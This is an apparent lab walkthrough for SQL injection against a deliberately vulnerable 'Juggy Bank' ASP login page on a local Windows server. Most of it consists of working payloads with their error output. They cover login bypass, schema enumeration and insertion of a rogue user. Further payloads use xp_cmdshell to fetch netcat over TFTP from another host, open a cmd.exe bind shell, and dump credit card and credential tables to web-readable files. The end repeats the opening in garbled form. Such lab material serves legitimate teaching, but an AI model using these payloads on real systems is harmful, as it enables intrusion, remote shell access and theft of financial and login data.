Lab Juggy Bank SQL injection
Juggy Bank SQL Injection Lab First of all let’s work out what data base the system is running. On your 2003 Server, open your web browser on type http://localhost/client2.htm You should have an entry that shows the Juggy Bank web page In the Login Name box type a single quote ‘ and press return. This should return and error page showing the database type and the asp script that has run Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '' and password = ''. /login.asp, line 5 As can be seen the back end database is running on MS SQL and the service doesn’t handle error messages by redirecting to an oooops page. Now let’s try blind SQL injecting into the Login Name box. This should bypass the authentication system In the Login box type luke' or 1=1 -- This then makes the SQL statement passed to the database as follows select * from userinfo where username=’luke’ or 1=1 -- and password=’’ Anything after the -- is ignored as a comment. This should log you into the web page as the first user on the database. Now let’s go back to the login screen and try enumerating the table. The first thing we need is the table name. Insert into the login box the following ' having 1=1 -- This will cause the following error Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'userinfo.username' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /login.asp, line 5 Notice the highlighted information, this is the Table name - userinfo and the column name - username Now we need to know the next columns in the table, type the following in the Login box ' group by userinfo.username having 1=1 -- This causes the following error Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'userinfo.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /login.asp, line 5 Now let’s try once more with the userinfo.password ' group by userinfo.password having 1=1 -- We get the same column again, indicating two columns in the userinfo table. Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'userinfo.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /login.asp, line 5 We must now enumerate the column types ' union select sum(username) from userinfo -- Which gives the following error indicating type is varchar Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument. /login.asp, line 5 And same for the password column ' union select sum(password) from userinfo -- Which is also a varchar. Now let’s create a new user. ' ; insert into userinfo values('john','password')-- Login with the new user created. Further Investigation Now let’s get some information on other databases. Let put a file on the web server '; exec master xp_cmdshell "echo I was here on %date% > c:\inetpub\wwwroot\Boo.txt" -- To check that the file is on the server open http://localhost/Boo.txt To fetch a file from a TFTP server e.g. netcat from 172.16.0.11 server '; exec master xp_cmdshell 'tftp -i 172.16.0.11 get nc.exe c:\inetpub\wwwroot\nc.exe' -- and then execute it listening on port 9999 ';exec master xp_cmdshell 'c:\inetpub\wwwroot\nc.exe -L -d -e cmd.exe -p 9999' -- You should now be able to telnet to the localhost on port 9999 Now let’s dump the credit card details into a txt file ';exec master xp_cmdshell 'osql -E -Q "select * from juggybank creditcard" -o c:\inetpub\wwwroot\card_details.txt' -- To fetch those details off the web server browse to the page http://localhost/card_details.txt To dump the login details ';exec master xp_cmdshell 'osql -E -Q "select * from juggybank userinfo" -o c:\inetpub\wwwroot\logins.txt' -- To fetch those details off the web server browse to the page http://localhost/logins.txt Similar commands con be run to mine data on sysdatabases ';exec master xp_cmdshell 'osql -E -Q "select * from master sysdatabases" -o c:\inetpub\wwwroot\masterdatabase.txt' -- ';exec master xp_cmdshell 'osql -E -Q "select * from juggybank sysobjects where xtype=''u'' " -o c:\inetpub\wwwroot\juggybanktables.txt' -- In the above statement xtype=’’u’’ is actually two sets of single quotes not a double To fetch those details off the web server browse to the page http://localhost/masterdatabase.txt and http://localhost/juggybanktables.txt Another way with stored procedures The above can be achieved by using a stored procedure. '; exec sp_makewebtask "c:\inetpub\wwwroot\evil.html", "select * from userinfo"; -- Now request this page with http://localhost/evil.html . Juggy Bank SQL Injection Lab First of all let’s work out what data base the system is running.. 'osql -E -Q "select * from juggybank..sysobjects where xtype=''u'' " -o c:inetpubwwwrootjuggybanktables.txt' -- In the